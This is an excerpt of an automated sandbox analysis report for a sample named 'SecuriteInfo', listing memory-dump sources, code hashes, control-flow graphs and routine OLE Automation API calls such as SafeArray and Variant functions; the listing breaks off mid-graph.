                                            • Instruction ID: 6af317cf7ec24d04e1cd476bb934074445e2799fb963c1799e3e892e2446cc67
                                            • Opcode Fuzzy Hash: 38b57784d4c5cddf620ec5264986e0b6e2479ba7d8e8e077a0b01ecba0d3d09c
                                            • Instruction Fuzzy Hash: D6125B74E01229CFDB64DF69C994BADBBB2BF89300F1081AAD40DA7365DB305A85CF51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba4e75bd5c98b1be71f2a0c226e09d84ecfa5d04c69f4c0182aebc4960a99d5d
                                            • Instruction ID: fb9069e646c67e710c650e5a22ea960ced64fc78f65a62e68e794282fcf26509
                                            • Opcode Fuzzy Hash: ba4e75bd5c98b1be71f2a0c226e09d84ecfa5d04c69f4c0182aebc4960a99d5d
                                            • Instruction Fuzzy Hash: D991E774E012189FDB68DFAAC880BDDBBB2BF89300F1481AAD51DA7351DB305A81CF51
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB84BF
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB84D2
                                            • SafeArrayGetElement.OLEAUT32 ref: 6CEB850A
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB94C1
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB94D4
                                            • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEB950C
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB97A4
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB97B7
                                            • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEB97F2
                                              • Part of subcall function 6CEB3A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB3B71
                                              • Part of subcall function 6CEB3A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB3B83
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB9D5F
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB9D72
                                            • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEB9DAF
                                              • Part of subcall function 6CEB3A90: SafeArrayDestroy.OLEAUT32(?), ref: 6CEB3BCF
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEBA1BC
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEBA1CF
                                            • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEBA20C
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$Destroy$Element
                                            • String ID: A
                                            • API String ID: 959723449-3554254475
                                            • Opcode ID: e8275036f9c649a00582d3de39d40bd8dbc287fcb93b897cf9698b54c7b2b2b4
                                            • Instruction ID: 6d6916518baba1cc994b2a60778b6da37f86ea76e1566bbc63e106ba44ef944a
                                            • Opcode Fuzzy Hash: e8275036f9c649a00582d3de39d40bd8dbc287fcb93b897cf9698b54c7b2b2b4
                                            • Instruction Fuzzy Hash: 4323A275A012059FDB00DFA4C984FED77B9AF49308F248198EA09BF796DB70E985CB50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1023 6ceb2970-6ceb29c1 1024 6ceb29cd-6ceb29d7 1023->1024 1025 6ceb29c3-6ceb29c8 call 6cf0c1e0 1023->1025 1091 6ceb29d8 call d6d148 1024->1091 1092 6ceb29d8 call d6d149 1024->1092 1025->1024 1027 6ceb29da-6ceb29dc 1028 6ceb2d12-6ceb2d18 1027->1028 1029 6ceb29e2-6ceb29e8 1027->1029 1030 6ceb2d1a-6ceb2d1b SafeArrayDestroy 1028->1030 1031 6ceb2d21-6ceb2d37 1028->1031 1029->1031 1032 6ceb29ee-6ceb2a1a SafeArrayGetLBound SafeArrayGetUBound 1029->1032 1030->1031 1032->1028 1033 6ceb2a20-6ceb2a37 SafeArrayGetElement 1032->1033 1033->1028 1034 6ceb2a3d-6ceb2a4d 1033->1034 1034->1025 1035 6ceb2a53-6ceb2a66 1034->1035 1089 6ceb2a67 call d6d148 1035->1089 1090 6ceb2a67 call d6d149 1035->1090 1036 6ceb2a69-6ceb2a6f 1037 6ceb2d5a-6ceb2d5f 1036->1037 1038 6ceb2a75-6ceb2a77 1036->1038 1040 6ceb2c76-6ceb2c78 1037->1040 1038->1037 1039 6ceb2a7d-6ceb2a92 call 6ceb38e0 1038->1039 1045 6ceb2c58-6ceb2c63 1039->1045 1046 6ceb2a98-6ceb2aac 1039->1046 1040->1028 1041 6ceb2c7e-6ceb2c86 1040->1041 1041->1028 1049 6ceb2c6d-6ceb2c72 1045->1049 1050 6ceb2c65-6ceb2c6a 1045->1050 1047 6ceb2aae-6ceb2ab3 1046->1047 1048 6ceb2ab6-6ceb2acc VariantInit 1046->1048 1047->1048 1048->1025 1051 6ceb2ad2-6ceb2ae3 1048->1051 1049->1040 1050->1049 1052 6ceb2ae9-6ceb2aeb 1051->1052 1053 6ceb2ae5-6ceb2ae7 1051->1053 1054 6ceb2aee-6ceb2af2 1052->1054 1053->1054 1055 6ceb2af8 1054->1055 1056 6ceb2af4-6ceb2af6 1054->1056 1057 6ceb2afa-6ceb2b34 1055->1057 1056->1057 1059 6ceb2c8b-6ceb2caa VariantClear * 2 1057->1059 1060 6ceb2b3a-6ceb2b50 VariantInit 1057->1060 1059->1049 1061 6ceb2cac-6ceb2cb4 1059->1061 1060->1025 1062 6ceb2b56-6ceb2b67 1060->1062 1061->1049 1063 6ceb2b69-6ceb2b6b 1062->1063 1064 6ceb2b6d-6ceb2b6f 1062->1064 1066 6ceb2b72-6ceb2b76 1063->1066 1064->1066 1067 6ceb2b78-6ceb2b7a 1066->1067 1068 6ceb2b7c 1066->1068 1069 6ceb2b7e-6ceb2bb8 1067->1069 1068->1069 1071 6ceb2d3a-6ceb2d55 VariantClear * 3 1069->1071 1072 6ceb2bbe-6ceb2bcb 1069->1072 1071->1045 1072->1071 1073 6ceb2bd1-6ceb2bf3 call 6cec3160 1072->1073 1077 6ceb2bf9-6ceb2c1f VariantClear * 3 1073->1077 1078 6ceb2cb6-6ceb2cf1 VariantClear * 3 1073->1078 1079 6ceb2c29-6ceb2c34 1077->1079 1080 6ceb2c21-6ceb2c26 1077->1080 1085 6ceb2cfb-6ceb2d06 1078->1085 1086 6ceb2cf3-6ceb2cf6 1078->1086 1081 6ceb2c3e-6ceb2c4d 1079->1081 1082 6ceb2c36-6ceb2c3b 1079->1082 1080->1079 1081->1033 1084 6ceb2c53 1081->1084 1082->1081 1084->1028 1087 6ceb2d08-6ceb2d0d 1085->1087 1088 6ceb2d10 1085->1088 1086->1085 1087->1088 1088->1028 1089->1036 1090->1036 1091->1027 1092->1027
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB29F6
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB2A08
                                            • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB2A2F
                                            • VariantInit.OLEAUT32(?), ref: 6CEB2ABB
                                            • VariantInit.OLEAUT32(?), ref: 6CEB2B3F
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2C04
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2C0B
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2C12
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2C96
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2C9D
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2CD6
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2CDD
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2CE4
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB2D1B
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2D45
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2D4C
                                            • VariantClear.OLEAUT32(?), ref: 6CEB2D53
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
                                            • String ID:
                                            • API String ID: 214056513-0
                                            • Opcode ID: 4378f71d5069ab10c2ee52263a2836a759877ce48c90326dc7d892e92dd9c5a5
                                            • Instruction ID: a73f69599859a441c2314ce8daf32448f1838020a69082cf6254b3eb21e5a1e1
                                            • Opcode Fuzzy Hash: 4378f71d5069ab10c2ee52263a2836a759877ce48c90326dc7d892e92dd9c5a5
                                            • Instruction Fuzzy Hash: 55C159716083419FD700CFA8C888A6ABBF9AFD9308F20895DF695DB660C675E845CB52

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1093 6ceaaf30-6ceaaf95 VariantInit * 3 1094 6ceaafa1-6ceaafa7 1093->1094 1095 6ceaaf97-6ceaaf9c call 6cf0c1e0 1093->1095 1097 6ceaafa9-6ceaafae 1094->1097 1098 6ceaafb1-6ceaafbf 1094->1098 1095->1094 1097->1098 1174 6ceaafc0 call d6d148 1098->1174 1175 6ceaafc0 call d6d149 1098->1175 1099 6ceaafc2-6ceaafc4 1100 6ceaafca-6ceaafda call 6ceb38e0 1099->1100 1101 6ceab22c-6ceab252 VariantClear * 3 1099->1101 1100->1101 1108 6ceaafe0-6ceaaff4 1100->1108 1103 6ceab25c-6ceab26a 1101->1103 1104 6ceab254-6ceab257 1101->1104 1106 6ceab26c-6ceab271 1103->1106 1107 6ceab274-6ceab288 1103->1107 1104->1103 1106->1107 1109 6ceaaffe-6ceab015 VariantCopy 1108->1109 1110 6ceaaff6-6ceaaff9 1108->1110 1111 6ceab01d-6ceab033 VariantClear 1109->1111 1112 6ceab017-6ceab018 call 6cf0c1e0 1109->1112 1110->1109 1114 6ceab03f-6ceab050 1111->1114 1115 6ceab035-6ceab03a call 6cf0c1e0 1111->1115 1112->1111 1117 6ceab052-6ceab054 1114->1117 1118 6ceab056-6ceab058 1114->1118 1115->1114 1119 6ceab05b-6ceab05f 1117->1119 1118->1119 1120 6ceab061-6ceab063 1119->1120 1121 6ceab065 1119->1121 1122 6ceab067-6ceab09a 1120->1122 1121->1122 1172 6ceab09d call d6d148 1122->1172 1173 6ceab09d call d6d149 1122->1173 1123 6ceab09f-6ceab0a1 1123->1101 1124 6ceab0a7-6ceab0b3 call 6cef9bb5 1123->1124 1127 6ceab0c1 1124->1127 1128 6ceab0b5-6ceab0bf 1124->1128 1129 6ceab0c3-6ceab0ca 1127->1129 1128->1129 1130 6ceab0d0-6ceab0d9 1129->1130 1130->1130 1131 6ceab0db-6ceab111 call 6cef91e1 call 6cefa136 1130->1131 1136 6ceab11d-6ceab12b 1131->1136 1137 6ceab113-6ceab118 call 6cf0c1e0 1131->1137 1139 6ceab12d-6ceab12f 1136->1139 1140 6ceab131-6ceab133 1136->1140 1137->1136 1141 6ceab136-6ceab13a 1139->1141 1140->1141 1142 6ceab13c-6ceab13e 1141->1142 1143 6ceab140 1141->1143 1144 6ceab142-6ceab17e 1142->1144 1143->1144 1146 6ceab1ff-6ceab203 1144->1146 1147 6ceab180-6ceab18a 1144->1147 1148 6ceab210-6ceab215 1146->1148 1149 6ceab205-6ceab20e call 6cef9c35 1146->1149 1150 6ceab28d-6ceab2b8 VariantClear * 3 1147->1150 1151 6ceab190-6ceab1b9 SafeArrayGetLBound SafeArrayGetUBound 1147->1151 1155 6ceab223-6ceab229 call 6cef9b35 1148->1155 1156 6ceab217-6ceab220 call 6cef9c35 1148->1156 1149->1148 1153 6ceab2ba-6ceab2bf 1150->1153 1154 6ceab2c2-6ceab2d0 1150->1154 1157 6ceab28b 1151->1157 1158 6ceab1bf-6ceab1cd SafeArrayAccessData 1151->1158 1153->1154 1161 6ceab2da-6ceab2ee 1154->1161 1162 6ceab2d2-6ceab2d7 1154->1162 1155->1101 1156->1155 1157->1150 1158->1157 1164 6ceab1d3-6ceab1f7 call 6cef91e1 call 6cefa530 SafeArrayUnaccessData 1158->1164 1162->1161 1164->1157 1171 6ceab1fd 1164->1171 1171->1146 1172->1123 1173->1123 1174->1099 1175->1099
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEAAF75
                                            • VariantInit.OLEAUT32(?), ref: 6CEAAF7C
                                            • VariantInit.OLEAUT32(?), ref: 6CEAAF83
                                            • VariantCopy.OLEAUT32(?,?), ref: 6CEAB00D
                                            • VariantClear.OLEAUT32(?), ref: 6CEAB027
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEAB19C
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEAB1AA
                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 6CEAB1C5
                                            • _memmove.LIBCMT ref: 6CEAB1E6
                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 6CEAB1EF
                                            • VariantClear.OLEAUT32(?), ref: 6CEAB237
                                            • VariantClear.OLEAUT32(?), ref: 6CEAB23E
                                            • VariantClear.OLEAUT32(?), ref: 6CEAB245
                                            • VariantClear.OLEAUT32(?), ref: 6CEAB29D
                                            • VariantClear.OLEAUT32(?), ref: 6CEAB2A4
                                            • VariantClear.OLEAUT32(?), ref: 6CEAB2AB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
                                            • String ID:
                                            • API String ID: 3403836469-0
                                            • Opcode ID: 1ddb8337ae22f2d1ff4e696e5ac35afc6884bc281035bc08cf6b9574ab6eaaa7
                                            • Instruction ID: ca17109b8443e6299a3e3f368843bf51c146575879d25371bd2758ea4e9eb7dc
                                            • Opcode Fuzzy Hash: 1ddb8337ae22f2d1ff4e696e5ac35afc6884bc281035bc08cf6b9574ab6eaaa7
                                            • Instruction Fuzzy Hash: 23C16BB2A043459FD700DFA8C88495BB7F9FB89308F25496DE659CB750D731E806CBA2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1176 6cebd410-6cebd44c 1177 6cebd44e-6cebd465 1176->1177 1178 6cebd472-6cebd4e0 VariantInit * 3 1176->1178 1181 6cebd470 1177->1181 1179 6cebd4ec-6cebd4f2 1178->1179 1180 6cebd4e2-6cebd4ea 1178->1180 1182 6cebd4f6-6cebd504 1179->1182 1180->1182 1181->1178 1183 6cebd51e-6cebd527 1182->1183 1184 6cebd506-6cebd50d 1182->1184 1187 6cebd529-6cebd530 1183->1187 1188 6cebd538-6cebd53c 1183->1188 1185 6cebd50f-6cebd512 1184->1185 1186 6cebd514-6cebd516 1184->1186 1190 6cebd518-6cebd51c 1185->1190 1186->1190 1187->1188 1191 6cebd532-6cebd536 1187->1191 1189 6cebd540-6cebd544 1188->1189 1192 6cebd54a-6cebd5c0 call 6cef9d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1189->1192 1193 6cebd704-6cebd72f VariantClear * 3 1189->1193 1190->1183 1190->1184 1191->1189 1200 6cebd5c2-6cebd5c4 1192->1200 1201 6cebd5c6-6cebd5ea call 6cefa530 SafeArrayUnaccessData 1192->1201 1194 6cebd76c-6cebd783 1193->1194 1195 6cebd731-6cebd757 1193->1195 1195->1181 1198 6cebd75d 1195->1198 1202 6cebd5ec-6cebd605 SafeArrayPutElement 1200->1202 1201->1202 1204 6cebd60b-6cebd629 1202->1204 1205 6cebd6e5-6cebd6eb 1202->1205 1207 6cebd62b-6cebd630 1204->1207 1208 6cebd633-6cebd64f SafeArrayPutElement VariantClear 1204->1208 1209 6cebd6ed-6cebd6f3 call 6cef9d2c 1205->1209 1210 6cebd6f6-6cebd6f8 1205->1210 1207->1208 1208->1205 1212 6cebd655-6cebd664 1208->1212 1209->1210 1213 6cebd6fa-6cebd6fb SafeArrayDestroy 1210->1213 1214 6cebd701 1210->1214 1216 6cebd66a-6cebd694 1212->1216 1217 6cebd762-6cebd767 call 6cf0c1e0 1212->1217 1213->1214 1214->1193 1229 6cebd697 call d6d148 1216->1229 1230 6cebd697 call d6d149 1216->1230 1217->1194 1219 6cebd699-6cebd69b 1219->1205 1220 6cebd69d-6cebd6a9 1219->1220 1220->1205 1221 6cebd6ab-6cebd6c1 call 6ceadb30 1220->1221 1221->1205 1224 6cebd6c3-6cebd6d5 call 6ceb56b0 call 6ceb6880 1221->1224 1228 6cebd6da-6cebd6e0 1224->1228 1228->1205 1229->1219 1230->1219
                                            APIs
                                            • VariantInit.OLEAUT32 ref: 6CEBD4B3
                                            • VariantInit.OLEAUT32 ref: 6CEBD4C5
                                            • VariantInit.OLEAUT32(?), ref: 6CEBD4CC
                                            • _malloc.LIBCMT ref: 6CEBD551
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEBD58B
                                            • SafeArrayCreateVector.OLEAUT32 ref: 6CEBD5A6
                                            • SafeArrayAccessData.OLEAUT32 ref: 6CEBD5B8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
                                            • String ID:
                                            • API String ID: 1552365394-0
                                            • Opcode ID: 494f33569bf8de0ffcee1fe55dbc64e8829d4d2abadaacce697e34a3b4c435a0
                                            • Instruction ID: c1ca330667da396a15ad396a2c53d71742185cd892458ea43c12918b0a4db1c4
                                            • Opcode Fuzzy Hash: 494f33569bf8de0ffcee1fe55dbc64e8829d4d2abadaacce697e34a3b4c435a0
                                            • Instruction Fuzzy Hash: 6CB156796083019FD314CF28C980A6ABBF9FF89318F25895DE895A7754E730E905CB92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1231 6cebd468 1232 6cebd470-6cebd4e0 VariantInit * 3 1231->1232 1234 6cebd4ec-6cebd4f2 1232->1234 1235 6cebd4e2-6cebd4ea 1232->1235 1236 6cebd4f6-6cebd504 1234->1236 1235->1236 1237 6cebd51e-6cebd527 1236->1237 1238 6cebd506-6cebd50d 1236->1238 1241 6cebd529-6cebd530 1237->1241 1242 6cebd538-6cebd53c 1237->1242 1239 6cebd50f-6cebd512 1238->1239 1240 6cebd514-6cebd516 1238->1240 1244 6cebd518-6cebd51c 1239->1244 1240->1244 1241->1242 1245 6cebd532-6cebd536 1241->1245 1243 6cebd540-6cebd544 1242->1243 1246 6cebd54a-6cebd5c0 call 6cef9d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1243->1246 1247 6cebd704-6cebd72f VariantClear * 3 1243->1247 1244->1237 1244->1238 1245->1243 1254 6cebd5c2-6cebd5c4 1246->1254 1255 6cebd5c6-6cebd5ea call 6cefa530 SafeArrayUnaccessData 1246->1255 1248 6cebd76c-6cebd783 1247->1248 1249 6cebd731-6cebd757 1247->1249 1249->1232 1252 6cebd75d 1249->1252 1256 6cebd5ec-6cebd605 SafeArrayPutElement 1254->1256 1255->1256 1258 6cebd60b-6cebd629 1256->1258 1259 6cebd6e5-6cebd6eb 1256->1259 1261 6cebd62b-6cebd630 1258->1261 1262 6cebd633-6cebd64f SafeArrayPutElement VariantClear 1258->1262 1263 6cebd6ed-6cebd6f3 call 6cef9d2c 1259->1263 1264 6cebd6f6-6cebd6f8 1259->1264 1261->1262 1262->1259 1266 6cebd655-6cebd664 1262->1266 1263->1264 1267 6cebd6fa-6cebd6fb SafeArrayDestroy 1264->1267 1268 6cebd701 1264->1268 1270 6cebd66a-6cebd694 1266->1270 1271 6cebd762-6cebd767 call 6cf0c1e0 1266->1271 1267->1268 1268->1247 1283 6cebd697 call d6d148 1270->1283 1284 6cebd697 call d6d149 1270->1284 1271->1248 1273 6cebd699-6cebd69b 1273->1259 1274 6cebd69d-6cebd6a9 1273->1274 1274->1259 1275 6cebd6ab-6cebd6c1 call 6ceadb30 1274->1275 1275->1259 1278 6cebd6c3-6cebd6ca call 6ceb56b0 1275->1278 1280 6cebd6cf-6cebd6d5 call 6ceb6880 1278->1280 1282 6cebd6da-6cebd6e0 1280->1282 1282->1259 1283->1273 1284->1273
                                            APIs
                                            • VariantInit.OLEAUT32 ref: 6CEBD4B3
                                            • VariantInit.OLEAUT32 ref: 6CEBD4C5
                                            • VariantInit.OLEAUT32(?), ref: 6CEBD4CC
                                            • _malloc.LIBCMT ref: 6CEBD551
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEBD58B
                                            • SafeArrayCreateVector.OLEAUT32 ref: 6CEBD5A6
                                            • SafeArrayAccessData.OLEAUT32 ref: 6CEBD5B8
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBD601
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBD63E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
                                            • String ID:
                                            • API String ID: 2723946344-0
                                            • Opcode ID: db51352bc46ce34cdb06e0f22f50243841989fbd48dc9f60252a738d30986e62
                                            • Instruction ID: 3715c311e6b1a6c1b5cf28f1eed14ace30cacbd450cb0c7ee43f7402157fe4f4
                                            • Opcode Fuzzy Hash: db51352bc46ce34cdb06e0f22f50243841989fbd48dc9f60252a738d30986e62
                                            • Instruction Fuzzy Hash: FC9178B96043019FD304CF28C980A6BBBF9BFC9318F25895CE895AB755D770EA05CB52

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1285 6ceb5140-6ceb51a8 VariantInit call 6cec2820 1288 6ceb5339-6ceb533e 1285->1288 1289 6ceb51ae-6ceb51ed SafeArrayCreateVector * 2 SafeArrayAccessData 1285->1289 1292 6ceb5349-6ceb534b 1288->1292 1293 6ceb5340-6ceb5346 call 6cef9d2c 1288->1293 1290 6ceb51ef-6ceb51f1 1289->1290 1291 6ceb51f3-6ceb5218 call 6cefa530 SafeArrayUnaccessData 1289->1291 1294 6ceb521a-6ceb5230 SafeArrayPutElement 1290->1294 1291->1294 1297 6ceb534d-6ceb534e SafeArrayDestroy 1292->1297 1298 6ceb5354-6ceb5372 VariantClear 1292->1298 1293->1292 1294->1288 1300 6ceb5236-6ceb5250 1294->1300 1297->1298 1302 6ceb525a-6ceb5276 SafeArrayPutElement VariantClear 1300->1302 1303 6ceb5252-6ceb5257 1300->1303 1302->1288 1304 6ceb527c-6ceb529a 1302->1304 1303->1302 1305 6ceb529c-6ceb529f 1304->1305 1306 6ceb52a4-6ceb52c0 SafeArrayPutElement VariantClear 1304->1306 1305->1306 1306->1288 1307 6ceb52c2-6ceb52d6 SafeArrayPutElement 1306->1307 1307->1288 1308 6ceb52d8-6ceb52e3 1307->1308 1309 6ceb52ef-6ceb531a 1308->1309 1310 6ceb52e5-6ceb52ea call 6cf0c1e0 1308->1310 1315 6ceb531b call d6d148 1309->1315 1316 6ceb531b call d6d149 1309->1316 1310->1309 1312 6ceb531d-6ceb531f 1312->1288 1313 6ceb5321-6ceb5333 1312->1313 1313->1288 1314 